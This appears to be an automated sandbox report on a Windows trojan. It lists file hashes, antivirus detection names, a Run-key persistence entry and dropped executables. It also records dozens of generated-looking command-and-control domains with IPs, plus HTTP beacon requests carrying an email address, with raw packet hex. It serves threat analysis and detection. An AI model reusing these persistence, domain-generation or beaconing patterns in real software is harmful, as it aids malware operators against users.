Analysis Date2015-10-13 02:40:38
MD5be312308e48774ec52287d7c81a8f02f
SHA1b8723f8e255e781d872215d72952683adb56425c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 9f05b1d8aa4f5ff41e462cf73fe16ab4 sha1: 0a50e074938ed57fcbe415b892f9297fcf0a871b size: 298496
Section.rdata md5: 3fcd2876c12a487eee833dfc3c28c51e sha1: 57af3ef68d61acc9fcdc2461ab3eef4af14d6b03 size: 34816
Section.data md5: 6849c68e1edb4dee7ff6a0767d2fabeb sha1: 89143637dc8a08c43dc7d97aad164c714da150b8 size: 95232
Timestamp2014-10-30 10:11:56
PackerMicrosoft Visual C++ ?.?
PEhash2b2eded05001f4e7d33a36fed36611a01538821c
IMPhashe1f41eaca6679124fbd6aeeff2612925
AVCA (E-Trust Ino)no_virus
AVF-SecureGen:Variant.Symmi.22722
AVDr. Webno_virus
AVClamAVno_virus
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVBullGuardGen:Variant.Symmi.22722
AVPadvishno_virus
AVVirusBlokAda (vba32)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVTrend MicroTSPY_NIVDORT.SMB
AVKasperskyTrojan.Win32.Generic
AVZillya!no_virus
AVEmsisoftGen:Variant.Symmi.22722
AVIkarusTrojan.FBAccountLock
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVMalwareBytesTrojan.Zbot.WHE
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVK7Trojan ( 004cb2771 )
AVBitDefenderGen:Variant.Symmi.22722
AVFortinetW32/Agent.VNC!tr
AVSymantecDownloader.Upatre!g15
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Agent.VNC
AVAlwil (avast)Kryptik-PJW [Trj]
AVAd-AwareGen:Variant.Symmi.22722
AVRisingno_virus
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAvira (antivir)BDS/Zegost.Gen4
AVMcafeeTrojan-FEMT!BE312308E487

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Encryption Link Protocol Shell Superfetch ➝
C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\euuoctu\jykqfuqpyhv.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.cearx
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\euuoctu\fhnqpgcjimfb.exe"

Network Details:

DNSmorningflower.net
Type: A
173.0.129.103
DNSweatherminute.net
Type: A
72.52.4.90
DNSclassminute.net
Type: A
208.100.26.234
DNSthinkadvance.net
Type: A
184.168.221.58
DNScollegeadvance.net
Type: A
97.74.42.79
DNSratherflower.net
Type: A
DNSratherminute.net
Type: A
DNSmorningminute.net
Type: A
DNSratherspecial.net
Type: A
DNSmorningspecial.net
Type: A
DNSrathercorner.net
Type: A
DNSmorningcorner.net
Type: A
DNSstrangeflower.net
Type: A
DNShistoryflower.net
Type: A
DNSstrangeminute.net
Type: A
DNShistoryminute.net
Type: A
DNSstrangespecial.net
Type: A
DNShistoryspecial.net
Type: A
DNSstrangecorner.net
Type: A
DNShistorycorner.net
Type: A
DNSamountflower.net
Type: A
DNSweatherflower.net
Type: A
DNSamountminute.net
Type: A
DNSamountspecial.net
Type: A
DNSweatherspecial.net
Type: A
DNSamountcorner.net
Type: A
DNSweathercorner.net
Type: A
DNSthickflower.net
Type: A
DNSclassflower.net
Type: A
DNSthickminute.net
Type: A
DNSthickspecial.net
Type: A
DNSclassspecial.net
Type: A
DNSthickcorner.net
Type: A
DNSclasscorner.net
Type: A
DNSpresentadvance.net
Type: A
DNSthinkstranger.net
Type: A
DNSpresentstranger.net
Type: A
DNSthinkgoodbye.net
Type: A
DNSpresentgoodbye.net
Type: A
DNSthinkfortieth.net
Type: A
DNSpresentfortieth.net
Type: A
DNSchiefadvance.net
Type: A
DNSchiefstranger.net
Type: A
DNScollegestranger.net
Type: A
DNSchiefgoodbye.net
Type: A
DNScollegegoodbye.net
Type: A
DNSchieffortieth.net
Type: A
DNScollegefortieth.net
Type: A
DNSoftenadvance.net
Type: A
DNSaloneadvance.net
Type: A
DNSoftenstranger.net
Type: A
DNSalonestranger.net
Type: A
DNSoftengoodbye.net
Type: A
DNSalonegoodbye.net
Type: A
DNSoftenfortieth.net
Type: A
DNSalonefortieth.net
Type: A
DNSmiddleadvance.net
Type: A
DNStwelveadvance.net
Type: A
DNSmiddlestranger.net
Type: A
DNStwelvestranger.net
Type: A
DNSmiddlegoodbye.net
Type: A
DNStwelvegoodbye.net
Type: A
DNSmiddlefortieth.net
Type: A
DNStwelvefortieth.net
Type: A
DNSratheradvance.net
Type: A
DNSmorningadvance.net
Type: A
DNSratherstranger.net
Type: A
DNSmorningstranger.net
Type: A
DNSrathergoodbye.net
Type: A
DNSmorninggoodbye.net
Type: A
DNSratherfortieth.net
Type: A
DNSmorningfortieth.net
Type: A
DNSstrangeadvance.net
Type: A
DNShistoryadvance.net
Type: A
DNSstrangestranger.net
Type: A
DNShistorystranger.net
Type: A
DNSstrangegoodbye.net
Type: A
DNShistorygoodbye.net
Type: A
DNSstrangefortieth.net
Type: A
DNShistoryfortieth.net
Type: A
DNSamountadvance.net
Type: A
DNSweatheradvance.net
Type: A
DNSamountstranger.net
Type: A
DNSweatherstranger.net
Type: A
DNSamountgoodbye.net
Type: A
HTTP GEThttp://morningflower.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GEThttp://weatherminute.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GEThttp://classminute.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GEThttp://thinkadvance.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
HTTP GEThttp://collegeadvance.net/index.php?email=merkez@verdihome.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 173.0.129.103:80
Flows TCP192.168.1.1:1032 ➝ 72.52.4.90:80
Flows TCP192.168.1.1:1033 ➝ 208.100.26.234:80
Flows TCP192.168.1.1:1034 ➝ 184.168.221.58:80
Flows TCP192.168.1.1:1035 ➝ 97.74.42.79:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206d6f 726e696e   se..Host: mornin
0x00000070 (00112)   67666c6f 7765722e 6e65740d 0a0d0a     gflower.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   726d696e 7574652e 6e65740d 0a0d0a     rminute.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636c 6173736d   se..Host: classm
0x00000070 (00112)   696e7574 652e6e65 740d0a0d 0a0d0a     inute.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b61   se..Host: thinka
0x00000070 (00112)   6476616e 63652e6e 65740d0a 0d0a0a     dvance.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6572 6b657a40 76657264   mail=merkez@verd
0x00000020 (00032)   69686f6d 652e636f 6d266d65 74686f64   ihome.com&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   65616476 616e6365 2e6e6574 0d0a0d0a   eadvance.net....
0x00000080 (00128)                                         


Strings